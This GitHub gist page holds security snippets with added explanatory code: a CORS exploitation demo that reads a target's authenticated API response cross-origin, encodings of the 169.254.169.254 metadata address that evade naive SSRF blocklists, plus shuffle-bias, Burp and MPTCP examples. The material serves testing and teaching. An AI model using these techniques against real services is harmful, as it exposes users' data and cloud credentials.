Patrick Thomas coffeetocode

View GitHub Profile
@coffeetocode
coffeetocode / CORS_demo.html
Created November 11, 2022 17:20
Basic HTML page for demoing exploitation of excessively open CORS policies
<html><head>
<meta http-equiv="content-type" content="text/html; charset=windows-1252">
<title>CORS test</title>
</head>
<body>
<h2>CORS Demo</h2>
<pre id="out"></pre>
<script>
//Original script from http://www.html5rocks.com/en/tutorials/cors/
// Create the XHR object. (The gist preview ends here; the rest is a minimal completion with a placeholder target URL.)
var url = "https://target.example/api/me"; // placeholder, not from the original gist: the endpoint whose CORS policy is being tested
var xhr = new XMLHttpRequest();
xhr.open("GET", url, true);
xhr.withCredentials = true; // attach the victim's cookies; the read succeeds only if the server reflects this page's Origin and sets Access-Control-Allow-Credentials: true
xhr.onload = function() { document.getElementById("out").textContent = xhr.responseText; };
xhr.onerror = function() { document.getElementById("out").textContent = "request blocked: CORS policy not exploitable from this origin"; };
xhr.send();
</script></body></html>
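The demo page above is the client half of the attack. As an added example, not code from the gist, here is the server-side header decision it exploits in three forms (the reflecting policy, a suffix-match half-fix that is still exploitable, and an exact-match allowlist), together with the triage a tester applies to the headers that come back from a probe carrying an attacker-chosen Origin. The origin names (app.example, admin.example, evil.example, notapp.example) and the allowlist are constructed for the example.

```python
# Added example (not from the gist): vulnerable and hardened CORS header
# decisions, plus triage of a probe response. Origins are constructed.
ALLOWED_ORIGINS = {"https://app.example", "https://admin.example"}  # constructed allowlist


def _grant(origin):
    """Headers that let a page on `origin` read the response with the user's cookies attached."""
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",
    }


def cors_headers_reflecting(request_headers):
    """The excessively open policy the demo page targets: every Origin is
    echoed back with credentials allowed, so any site can read authenticated responses."""
    origin = request_headers.get("Origin")
    return _grant(origin) if origin else {}


def cors_headers_suffix_match(request_headers):
    """A common half-fix that is still exploitable: a string suffix test,
    which https://notapp.example passes just as https://app.example does."""
    origin = request_headers.get("Origin", "")
    return _grant(origin) if origin.endswith("app.example") else {}


def cors_headers_allowlisted(request_headers):
    """Hardened: exact match against a fixed set. Unknown origins get no CORS
    headers at all, so the browser withholds the response body from the page."""
    origin = request_headers.get("Origin")
    return _grant(origin) if origin in ALLOWED_ORIGINS else {}


def triage(probe_origin, response_headers):
    """Classify the response to a request that carried probe_origin as its Origin,
    which is what to check before bothering with the demo page."""
    h = {k.lower(): v for k, v in response_headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    if acao is None:
        return "no-cors"
    if acao == "*":
        return "wildcard-public-data"  # browsers refuse credentialed reads for "*"
    if acao == "null":
        return "null-origin-trusted" if creds else "null-origin-no-credentials"
    if acao == probe_origin:
        return "origin-echoed-with-credentials" if creds else "origin-echoed-no-credentials"
    return "fixed-origin"


if __name__ == "__main__":
    probe = {"Origin": "https://evil.example"}
    for policy in (cors_headers_reflecting, cors_headers_suffix_match, cors_headers_allowlisted):
        print("%-26s %s" % (policy.__name__, triage(probe["Origin"], policy(probe))))
```

The finding the demo page exploits is the combination "Access-Control-Allow-Origin" equal to the probe origin plus "Access-Control-Allow-Credentials: true"; a wildcard is readable cross-origin but browsers will not attach cookies to it, so only unauthenticated data is exposed. Probe with a sibling-looking origin (notapp.example for app.example) as well as an arbitrary one, since suffix and substring matches are the usual way an "allowlist" turns out to be open.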
coffeetocode / example_output.txt
Last active September 15, 2022 18:29
Example of bypasses for naive blacklists of the 169.254.169.254 local metadata service. Useful for SSRF testing, among other things. See https://twitter.com/coffeetocode/status/912788650408026112
$ ./try_local_metadata.sh
Trying 169.254.169.254... found metadata
Trying 169.254.43518... found metadata
Trying 169.16689662... found metadata
Trying 2852039166... found metadata
Trying 0251.0376.0251.0376... found metadata
Trying 0251.0376.0124776... found metadata
Trying 251.0775248... -
Trying 25177524776... -
Trying 0xa9.0xfe.0xa9.0xfe... found metadata
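Every spelling that "found metadata" above is accepted by the lenient inet_aton() address grammar (dotted parts in decimal, octal or hex, and fewer than four parts with the last one filling the remaining bits), which most URL and socket libraries inherit. As an added example, not the script from the gist, the following reproduces those spellings, the naive string blocklist they defeat, and a check that parses first and compares the 32-bit value, rejecting the whole 169.254.0.0/16 link-local range while it is at it. The parser mirrors the inet_aton grammar; the blocklist and every address other than 169.254.169.254 are constructed for the example.

```python
# Added example (not from the gist): inet_aton-style parsing, the bypass
# variants from the transcript, and a naive vs. normalizing blocklist check.
import re

METADATA_IP = "169.254.169.254"


def parse_part(part):
    """Decode one dotted component the way inet_aton() does: 0x.. is hex,
    a leading 0 means octal, anything else is decimal."""
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def inet_aton_int(text):
    """Return the 32-bit integer for an address in any inet_aton() form
    (a.b.c.d, a.b.c, a.b or a), or None if the text is not an address."""
    if not re.fullmatch(r"[0-9A-Za-z.]+", text):
        return None
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [parse_part(p) for p in parts]
    except ValueError:
        return None
    # All but the last part are single octets; the last part fills the remaining bits.
    last_bits = 8 * (5 - len(parts))
    if any(not 0 <= v <= 0xFF for v in values[:-1]) or not 0 <= values[-1] < (1 << last_bits):
        return None
    result = 0
    for v in values[:-1]:
        result = (result << 8) | v
    return (result << last_bits) | values[-1]


def variants(ip):
    """The alternative spellings of a dotted-decimal address that the script above tried."""
    a, b, c, d = (int(x) for x in ip.split("."))
    as_int = (a << 24) | (b << 16) | (c << 8) | d
    return [
        ip,
        "%d.%d.%d" % (a, b, (c << 8) | d),        # last two octets merged
        "%d.%d" % (a, (b << 16) | (c << 8) | d),   # last three merged
        str(as_int),                               # one 32-bit integer
        "0%o.0%o.0%o.0%o" % (a, b, c, d),          # dotted octal
        "0%o.0%o.0%o" % (a, b, (c << 8) | d),      # mixed octal
        "0x%x.0x%x.0x%x.0x%x" % (a, b, c, d),      # dotted hex
        "0x%x" % as_int,                           # one hex integer
    ]


def naive_blocklist_allows(host):
    """The broken check: string comparison against the canonical spelling only."""
    return host != METADATA_IP


def hardened_allows(host):
    """Parse first, then compare numbers: blocks the metadata address in every
    spelling and the whole 169.254.0.0/16 link-local block. Unparseable input
    is refused too; a real check resolves hostnames and re-applies this test
    to every resulting address, since the name may resolve to 169.254.169.254."""
    value = inet_aton_int(host)
    if value is None:
        return False
    return (value >> 16) != 0xA9FE


if __name__ == "__main__":
    for v in variants(METADATA_IP):
        print("%-22s naive allows=%-5s hardened allows=%-5s value=%s"
              % (v, naive_blocklist_allows(v), hardened_allows(v), inet_aton_int(v)))
```

The two misses in the transcript fall out of the same grammar: in 251.0775248 the first part has no leading zero and so is decimal 251, and 0775248 is not valid octal at all; 25177524776 without its leading zero is a decimal that exceeds 32 bits, so neither is an address. Hostnames, IPv6 forms such as [::ffff:169.254.169.254], and redirects to any of these are outside this check and need their own handling.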
// Measures how biased a "shuffle" built on Array.prototype.sort with a random
// comparator is, by counting how often each name lands in each position.
var const_arr = ["Erin Ptacek", "Thomas Ptacek", "Jeremy Rauch"];
var results = {};
for (var j = 0; j < const_arr.length; j++) {
results[const_arr[j]] = {0: 0, 1: 0, 2: 0};
}
for (var i = 0; i < 1000000; i++) {
// the comparator answers 1, 0 or -1 at random (the same value range a proper "x - y" comparator would return)
var arr = const_arr.slice().sort(function(x, y) { return 1 - Math.ceil(Math.random() * 100) % 3; });
for (var name in results) {
results[name][arr.indexOf(name)]++;
}
}
console.log(results);
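The loop above measures one shuffle technique by position counts. As an added example (not the gist's code; written in Python so it sits beside the other examples on this page), here is the same measurement for a random-comparator sort next to a Fisher-Yates shuffle driven by the secrets module, which is the construction to use when the order is security-relevant. The names are the gist's; the trial counts are arbitrary.

```python
# Added example (not from the gist): position-count measurement of a
# random-comparator "shuffle" versus a CSPRNG-backed Fisher-Yates shuffle.
import random
import secrets
from collections import Counter
from functools import cmp_to_key

NAMES = ["Erin Ptacek", "Thomas Ptacek", "Jeremy Rauch"]


def random_comparator_shuffle(items):
    """The technique the gist measures: sort with a comparator that answers
    -1, 0 or 1 at random. The result depends on the sort algorithm's comparison
    pattern rather than on a uniform draw, so some orders come out more often."""
    return sorted(items, key=cmp_to_key(lambda x, y: random.choice((-1, 0, 1))))


def fisher_yates_shuffle(items):
    """Unbiased shuffle: each position draws uniformly from the elements not yet
    placed, with secrets.randbelow() so the order is not predictable either."""
    out = list(items)
    for i in range(len(out) - 1, 0, -1):
        j = secrets.randbelow(i + 1)
        out[i], out[j] = out[j], out[i]
    return out


def position_counts(shuffle, items, trials):
    """How often each element lands in each position over `trials` runs."""
    counts = {item: Counter() for item in items}
    for _ in range(trials):
        for pos, item in enumerate(shuffle(items)):
            counts[item][pos] += 1
    return counts


def max_deviation(counts, trials):
    """Largest relative deviation of any (element, position) cell from the
    uniform expectation trials / n; near zero for an unbiased shuffle."""
    n = len(counts)
    expected = trials / n
    return max(abs(c[pos] - expected) / expected for c in counts.values() for pos in range(n))


if __name__ == "__main__":
    trials = 100000
    for shuffle in (random_comparator_shuffle, fisher_yates_shuffle):
        counts = position_counts(shuffle, NAMES, trials)
        print(shuffle.__name__, "max deviation from uniform: %.3f" % max_deviation(counts, trials))
        for name in NAMES:
            print("  %-14s %s" % (name, dict(counts[name])))
```

The size and shape of the bias in the comparator version depends on the engine's sort algorithm (which comparisons it makes for three elements), which is exactly why it is not a shuffle: its output distribution is an accident of the implementation. The Fisher-Yates version is uniform by construction, and substituting secrets for random keeps the order unpredictable to an observer who has seen earlier draws.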
coffeetocode / BurpPluginDemo.py
Created September 14, 2013 05:47
Code sample included with "Burp Extensions in Python & Pentesting Custom Web Services" at http://labs.neohapsis.com/
# These are java classes, being imported using python syntax (Jython magic)
from burp import IBurpExtender
from burp import IHttpListener
# These are plain old python modules, from the standard library
# (or from the "Folder for loading modules" in Burp>Extender>Options)
from datetime import datetime
class BurpExtender(IBurpExtender, IHttpListener):
    # The gist preview stops at the class line; this body is a minimal completion using the standard Burp extender API, not the original sample.
    def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        callbacks.setExtensionName("Burp plugin demo")
        callbacks.registerHttpListener(self)  # route every request and response through processHttpMessage
    def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
        self._callbacks.printOutput("%s %s %s" % (datetime.now(), "request" if messageIsRequest else "response", messageInfo.getHttpService()))
# Uses Nicolas Maitre's MPTCP-capable scapy impl, so that should be
# on the python path, or run this from a directory containing that "scapy" dir
from scapy.all import *

packets = rdpcap("pcaps/neohapsis_mptcp_challenge.pcap")

# Keep only TCP segments from the two hosts of interest that carry an MPTCP
# DSS option (subtype 2, the option mapping subflow bytes onto the
# connection-level data sequence space) and an actual payload.
payload_packets = [p for p in packets if TCP in p
                   and p[IP].src in ("192.168.1.26", "192.168.1.33")
                   and TCPOption_MP in p
                   and p[TCPOption_MP].mptcp.subtype == 2
                   and Raw in p]

for p in payload_packets:
    print(p[IP].src, p[TCP].sport, len(p[Raw].load))
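The filter above singles out segments carrying a DSS option because the subflow-level TCP sequence numbers say nothing about where a segment's bytes sit in the connection-level stream; that position is what the DSS data sequence number (DSN) encodes, and it is why a tool that reassembles each TCP connection on its own sees only fragments. As an added example, not the challenge script and independent of the scapy fork, here is a stand-alone parser for the DSS option layout from RFC 6824 and a reassembler that orders segments from several subflows by DSN. The capture is constructed inline (4-byte DSNs, no Data ACK, no checksum field, i.e. checksums not negotiated), so it runs offline.

```python
# Added example (not from the gist): MPTCP DSS option parsing and cross-subflow
# reassembly by data sequence number, over a constructed two-subflow capture.
import struct

TCP_OPT_MPTCP = 30
MPTCP_SUBTYPE_DSS = 2


def tcp_options(raw):
    """Yield (kind, body) for every option in a TCP options field."""
    i = 0
    while i < len(raw):
        kind = raw[i]
        if kind == 0:          # End of option list
            return
        if kind == 1:          # NOP padding
            i += 1
            continue
        if i + 1 >= len(raw) or raw[i + 1] < 2 or i + raw[i + 1] > len(raw):
            raise ValueError("malformed TCP option at offset %d" % i)
        length = raw[i + 1]
        yield kind, raw[i + 2:i + length]
        i += length


def parse_dss(body):
    """Decode an MPTCP option body. Returns (dsn, subflow_seq, data_len) when it
    is a DSS carrying a data sequence mapping (M flag), else None.
    RFC 6824 layout after kind/length: subtype(4b) | flags byte rsv F m M a A |
    [Data ACK 4 or 8] [DSN 4 or 8, subflow seq 4, data-level length 2, checksum 2 if negotiated]."""
    if len(body) < 2 or body[0] >> 4 != MPTCP_SUBTYPE_DSS:
        return None
    flags = body[1]
    off = 2
    if flags & 0x01:                      # A: Data ACK present
        off += 8 if flags & 0x02 else 4   # a: 8-byte Data ACK
    if not flags & 0x04:                  # M: no mapping in this option
        return None
    dsn_len = 8 if flags & 0x08 else 4    # m: 8-byte DSN
    if len(body) < off + dsn_len + 6:
        raise ValueError("truncated DSS mapping")
    dsn = int.from_bytes(body[off:off + dsn_len], "big")
    ssn, dll = struct.unpack("!IH", body[off + dsn_len:off + dsn_len + 6])
    return dsn, ssn, dll


def dss_option(dsn, ssn, dll):
    """Build a DSS option (4-byte DSN, no Data ACK, no checksum) padded with
    NOPs to a 4-byte boundary, as it would appear in a TCP header."""
    body = bytes([MPTCP_SUBTYPE_DSS << 4, 0x04]) + struct.pack("!IIH", dsn, ssn, dll)
    opt = bytes([TCP_OPT_MPTCP, 2 + len(body)]) + body
    return opt + b"\x01" * (-len(opt) % 4)


def reassemble(segments):
    """segments: iterable of (subflow_id, tcp_options_bytes, payload_bytes).
    Returns the connection-level byte stream, requiring each mapping to cover
    exactly its payload and the mappings to be contiguous in DSN space."""
    mapped = []
    for subflow, opts, payload in segments:
        for kind, body in tcp_options(opts):
            if kind != TCP_OPT_MPTCP:
                continue
            mapping = parse_dss(body)
            if mapping is None:
                continue
            dsn, _ssn, dll = mapping
            if dll != len(payload):
                raise ValueError("mapping length %d != payload %d on subflow %s" % (dll, len(payload), subflow))
            mapped.append((dsn, payload))
    mapped.sort()
    stream = b""
    expect = mapped[0][0] if mapped else None
    for dsn, payload in mapped:
        if dsn != expect:
            raise ValueError("gap or overlap at DSN %d (expected %d)" % (dsn, expect))
        stream += payload
        expect = dsn + len(payload)
    return stream


def per_subflow(segments):
    """What a tool that tracks each TCP connection separately sees: one fragmentary stream per subflow."""
    view = {}
    for subflow, _opts, payload in segments:
        view[subflow] = view.get(subflow, b"") + payload
    return view


def sample_segments():
    """Constructed capture: one message cut into 5-byte chunks, alternated across
    two subflows and delivered in reverse order. DSN space starts at 0x1000."""
    message = b"The flag is split across both subflows"
    chunks = [message[i:i + 5] for i in range(0, len(message), 5)]
    segs, dsn, ssn = [], 0x1000, {"A": 1, "B": 1}
    for n, chunk in enumerate(chunks):
        flow = "A" if n % 2 == 0 else "B"
        segs.append((flow, dss_option(dsn, ssn[flow], len(chunk)), chunk))
        dsn += len(chunk)
        ssn[flow] += len(chunk)
    segs.reverse()
    return message, segs


if __name__ == "__main__":
    message, segs = sample_segments()
    for flow, data in sorted(per_subflow(segs).items()):
        print("subflow %s alone: %r" % (flow, data))
    print("reassembled by DSN:", reassemble(segs))
```

The per-subflow views are what a stream reassembler keyed on the 4-tuple produces, and neither contains the message; only ordering by DSN across both subflows does. A real implementation also has to handle 8-byte DSNs, the optional checksum, mappings that span several segments, and retransmissions of the same DSN range on another subflow (the overlap case this version rejects).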